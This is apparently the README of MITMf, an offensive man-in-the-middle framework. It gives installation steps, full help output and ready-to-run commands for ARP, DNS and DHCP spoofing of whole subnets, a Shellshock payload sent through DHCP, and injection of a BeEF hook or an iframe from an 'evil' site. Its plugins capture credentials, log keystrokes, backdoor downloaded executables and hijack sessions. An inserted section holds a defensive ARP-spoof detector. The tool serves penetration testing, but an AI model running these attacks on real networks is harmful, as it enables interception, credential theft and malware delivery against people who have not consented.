byt3bl33d3r / MITMf Public archive
# Installation
MITMf relies on a LOT of external libraries, so it is highly recommended that you use virtualenvs to install the framework; this avoids permission issues and conflicts with your system site-packages (especially on Kali Linux).
Before starting the installation process, install the native build dependencies for your distro (the first line is the pacman command for Arch-based systems, the second the apt-get command for Debian-based systems):
```bash
# Arch Linux / BlackArch
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone
# Debian, Ubuntu, Kali and other apt-based distros
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
```
# Installing MITMf
Note: if you're rocking Arch Linux: you're awesome! Just remember to use pip2 instead of pip outside of the virtualenv.
```bash
pip install virtualenvwrapper
source /usr/bin/virtualenvwrapper.sh
```
The location of this script may vary depending on your Linux distro.
```bash
source /usr/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive
pip install -r requirements.txt
```
MITMf
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
Originally built to address the significant shortcomings of other tools (e.g. Ettercap, Mallory), it has been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
Features
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins; it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
- Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
Active packet filtering/modification
You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:
```python
# MITMf runs the filter file with `packet` (the intercepted packet as a Scapy
# object), `data` (the raw bytes) and `log` already defined, and with Scapy's
# layer classes such as ICMP in scope.
if packet.haslayer(ICMP):
    log.info('Got an ICMP packet!')
    packet.dst = '192.168.1.0'
```
- Use the `packet` variable to access the packet in a Scapy compatible format
- Use the `data` variable to access the raw packet data
Now to use the filter all we need to do is:
```bash
python mitmf.py -F ~/filter.py
```
You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else 😉
Note: you can modify filters on-the-fly without restarting MITMf!
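The same packet-by-packet inspection works in the other direction. As an added example (not MITMf code and not from the project), here is a small ARP watcher that flags the binding changes an ARP-spoofing run such as the Spoof plugin's --arp mode leaves on the wire: an IP address that was bound to one MAC suddenly being claimed by another, or the configured gateway IP being claimed by anything but its trusted MAC. The packets are constructed dictionaries mimicking Scapy's ARP layer fields (`op`, `psrc`, `hwsrc`) so the script runs without Scapy or a live interface; the `ArpWatch` class, its alert wording and the sample addresses are assumptions of this example.

```python
"""ARP-spoof detector: the defensive counterpart of a MITMf/Scapy packet filter.

Added example, not part of MITMf. It consumes ARP replies and alerts when an
IP address changes the MAC it is bound to, which is what ARP poisoning looks
like from the victim's side. On a real host the dictionaries would be filled
from pkt[ARP].op, pkt[ARP].psrc and pkt[ARP].hwsrc inside a Scapy sniff()
callback; here they are constructed so the script runs offline.
"""
from collections import defaultdict

ARP_REPLY = 2  # Scapy ARP.op value for "is-at"


class ArpWatch:
    def __init__(self, trusted=None):
        # ip -> set of MAC addresses that have claimed it so far
        self.bindings = defaultdict(set)
        # ip -> MAC pairs the operator vouches for (e.g. the real gateway)
        self.trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        self.alerts = []

    def observe(self, pkt):
        """Feed one ARP packet (dict with op/psrc/hwsrc).

        Returns an alert string, or None when the packet is benign.
        """
        if pkt.get("op") != ARP_REPLY:
            return None  # requests carry no binding claim worth tracking
        ip, mac = pkt["psrc"], pkt["hwsrc"].lower()
        known = self.bindings[ip]
        alert = None
        if ip in self.trusted and mac != self.trusted[ip]:
            alert = ("ARP spoof suspected: %s claimed by %s, trusted MAC is %s"
                     % (ip, mac, self.trusted[ip]))
        elif known and mac not in known:
            alert = ("ARP binding change: %s was %s, now also %s"
                     % (ip, sorted(known), mac))
        known.add(mac)
        if alert:
            self.alerts.append(alert)
        return alert


def run_demo():
    """Replay constructed sample traffic and return one result per packet."""
    sample = [
        {"op": 1, "psrc": "192.168.1.10", "hwsrc": "aa:aa:aa:aa:aa:10"},  # request, ignored
        {"op": 2, "psrc": "192.168.1.1",  "hwsrc": "00:11:22:33:44:55"},  # real gateway reply
        {"op": 2, "psrc": "192.168.1.10", "hwsrc": "aa:aa:aa:aa:aa:10"},  # ordinary host
        {"op": 2, "psrc": "192.168.1.1",  "hwsrc": "de:ad:be:ef:00:01"},  # gateway IP, foreign MAC
        {"op": 2, "psrc": "192.168.1.10", "hwsrc": "AA:AA:AA:AA:AA:10"},  # same host, case differs only
    ]
    watch = ArpWatch(trusted={"192.168.1.1": "00:11:22:33:44:55"})
    return [watch.observe(p) for p in sample]


if __name__ == "__main__":
    for result in run_demo():
        if result:
            print(result)
```

The trusted-MAC check is deliberately separate from the generic binding-change check: the former needs operator knowledge of the real gateway but catches the very first poisoned reply, while the latter needs no configuration but only fires once a second MAC has been seen for the same IP.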
MITMf Help
```
usage: mitmf.py -i interface [mitmf options] [plugin name] [plugin options]

optional arguments:
  -h, --help                  show this help message and exit
  -v, --version               show program's version number and exit

MITMf:
  Options for MITMf

  --log-level                 Specify a log level [default: info]
  -i INTERFACE                Interface to listen on
  -c CONFIG_FILE              Specify config file to use
  -p, --preserve-cache        Don't kill client/server caching
  -r READ_PCAP, --read-pcap READ_PCAP
                              Parse specified pcap for credentials and exit
  -l PORT                     Port to listen on (default 10000)
  -f, --favicon               Substitute a lock favicon on secure requests.
  -k, --killsessions          Kill sessions in progress.
  -F FILTER, --filter FILTER  Filter to apply to incoming traffic

Upsidedownternet:
  Flips images 180 degrees

  --upsidedownternet          Load plugin 'Upsidedownternet'

AppCachePoison:
  Performs App Cache Poisoning attacks

  --appoison                  Load plugin 'AppCachePoison'

Inject:
  Inject arbitrary content into HTML content

  --inject                    Load plugin 'Inject'
  --js-url JS_URL             URL of the JS to inject
  --js-payload JS_PAYLOAD     JS string to inject
  --js-file JS_FILE           File containing JS to inject
  --html-url HTML_URL         URL of the HTML to inject
  --html-payload HTML_PAYLOAD HTML string to inject
  --html-file HTML_FILE       File containing HTML to inject
  --per-domain                Inject once per domain per client.
  --rate-limit RATE_LIMIT     Inject once every RATE_LIMIT seconds per client.
  --count-limit COUNT_LIMIT   Inject only COUNT_LIMIT times per client.
  --white-ips IP              Inject content ONLY for these ips (comma seperated)
  --black-ips IP              DO NOT inject content for these ips (comma seperated)
  --white-domains DOMAINS     Inject content ONLY for these domains (comma seperated)
  --black-domains DOMAINS     DO NOT inject content for these domains (comma seperated)

BrowserProfiler:
  Attempts to enumerate all browser plugins of connected clients

  --browserprofiler           Load plugin 'BrowserProfiler'

HTA Drive-By:
  Performs HTA drive-by attacks on clients

  --hta                       Load plugin 'HTA Drive-By'
  --text TEXT                 Text to display on notification bar
  --hta-app HTA_APP           Path to HTA application [defaults to config/hta_driveby/flash_setup.hta]

SSLstrip+:
  Enables SSLstrip+ for partial HSTS bypass

  --hsts                      Load plugin 'SSLstrip+'

SMBTrap:
  Exploits the SMBTrap vulnerability on connected clients

  --smbtrap                   Load plugin 'SMBTrap'

SMBAuth:
  Evoke SMB challenge-response auth attempts

  --smbauth                   Load plugin 'SMBAuth'

JSKeylogger:
  Injects a javascript keylogger into clients webpages

  --jskeylogger               Load plugin 'JSKeylogger'

BrowserSniper:
  Performs drive-by attacks on clients with out-of-date browser plugins

  --browsersniper             Load plugin 'BrowserSniper'

FilePwn:
  Backdoor executables being sent over http using bdfactory

  --filepwn                   Load plugin 'FilePwn'

Replace:
  Replace arbitrary content in HTML content

  --replace                   Load plugin 'Replace'

ScreenShotter:
  Uses HTML5 Canvas to render an accurate screenshot of a clients browser

  --screen                    Load plugin 'ScreenShotter'
  --interval SECONDS          Interval at which screenshots will be taken (default 10 seconds)

ImageRandomizer:
  Replaces images with a random one from a specified directory

  --imgrand                   Load plugin 'ImageRandomizer'
  --img-dir DIRECTORY         Directory with images

Ferret-NG:
  Captures cookies and starts a proxy that will feed them to connected clients

  --ferretng                  Load plugin 'Ferret-NG'
  --port PORT                 Port to start Ferret-NG proxy on (default 10010)
  --load-cookies FILE         Load cookies from a log file

Responder:
  Poison LLMNR, NBT-NS and MDNS requests

  --responder                 Load plugin 'Responder'
  --analyze                   Allows you to see NBT-NS, BROWSER, LLMNR requests without poisoning
  --wredir                    Enables answers for netbios wredir suffix queries
  --nbtns                     Enables answers for netbios domain suffix queries
  --fingerprint               Fingerprint hosts that issued an NBT-NS or LLMNR query
  --lm                        Force LM hashing downgrade for Windows XP/2003 and earlier
  --wpad                      Start the WPAD rogue proxy server
  --forcewpadauth             Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)
  --basic                     Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned

Spoof:
  Redirect/Modify traffic using ICMP, ARP, DHCP or DNS

  --spoof                     Load plugin 'Spoof'
  --arp                       Redirect traffic using ARP spoofing
  --icmp                      Redirect traffic using ICMP redirects
  --dhcp                      Redirect traffic using DHCP offers
  --dns                       Proxy/Modify DNS queries
  --netmask NETMASK           The netmask of the network
  --shellshock PAYLOAD        Trigger the Shellshock vuln when spoofing DHCP, and execute specified command
  --gateway GATEWAY           Specify the gateway IP
  --gatewaymac GATEWAYMAC     Specify the gateway MAC [will auto resolve if ommited]
  --targets TARGETS           Specify host/s to poison [if ommited will default to subnet]
  --ignore IGNORE             Specify host/s not to poison
  --arpmode                   ARP Spoofing mode: replies (rep) or requests (req) [default: rep]
```
MITMf Usage Example
The most basic usage starts the HTTP proxy, the SMB, DNS and HTTP servers and Net-Creds on interface enp3s0:
```bash
python mitmf.py -i enp3s0
```
ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:
```bash
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
```
Same as above + a WPAD rogue proxy server using the Responder plugin:
```bash
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
```
ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:
```bash
python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
```
Enable DNS spoofing while ARP poisoning (domains to spoof are pulled from the config file):
```bash
python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
```
Enable LLMNR/NBTNS/MDNS spoofing:
```bash
python mitmf.py -i enp3s0 --responder --wredir --nbtns
```
Enable DHCP spoofing (the IP pool and subnet are pulled from the config file):
```bash
python mitmf.py -i enp3s0 --spoof --dhcp
```
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
```bash
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
```
Inject an HTML IFrame using the Inject plugin:
```bash
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
```
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc.).
For a complete list of available options, just run:
```bash
python mitmf.py --help
```
How to install MITMf
Installation on Kali Linux
```bash
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libxml2-dev libxslt1-dev
pip install virtualenvwrapper
source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
pip install requests[security]
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive
pip install -r requirements.txt
python mitmf.py --help
```
After reboot go to the directory with the installed program and re-enter the virtualenv:
```bash
source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
python mitmf.py --help
```
Installation on BlackArch
```bash
pacman -S mitmf python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone
sudo pip install virtualenvwrapper
source /usr/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
pip install requests[security]
cd /usr/share/mitmf/
pip install -r requirements.txt
cd
sudo python /usr/share/mitmf/mitmf.py --help
```
Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:
```bash
source /usr/bin/virtualenvwrapper.sh
```
Installation on Linux (Debian, Mint, Ubuntu)
```bash
sudo apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev python-pip git libxml2-dev libxslt1-dev libffi-dev libjpeg-dev libffi-dev libssl-dev libnfnetlink* libnetfilter-queue-dev
sudo pip install capstone
sudo pip install virtualenvwrapper
sudo -s
source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
sudo pip install requests[security]
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive
pip install -r requirements.txt
python mitmf.py --help
```
After reboot go to the directory with the installed program and re-enter the virtualenv:
```bash
sudo -s
source /usr/local/bin/virtualenvwrapper.sh
mkvirtualenv MITMf -p /usr/bin/python2.7
python mitmf.py --help
```
MITMf Screenshots
The program is a command-line utility.
MITMf Tutorials
Currently available plugins
- HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
- SMBTrap : Exploits the ‘SMB Trap’ vulnerability on connected clients
- ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
- Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
- SSLstrip+ : Partially bypass HSTS
- Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- BeEFAutorun : Autoruns BeEF modules based on a client’s OS or browser type
- AppCachePoison : Performs HTML5 App-Cache poisoning attacks
- Ferret-NG : Transparently hijacks client sessions
- BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
- FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- Inject : Inject arbitrary content into HTML content
- BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
- JSkeylogger : Injects a Javascript keylogger into a client’s webpages
- Replace : Replace arbitrary content in HTML content
- SMBAuth : Evoke SMB challenge-response authentication attempts
- Upsidedownternet : Flips images 180 degrees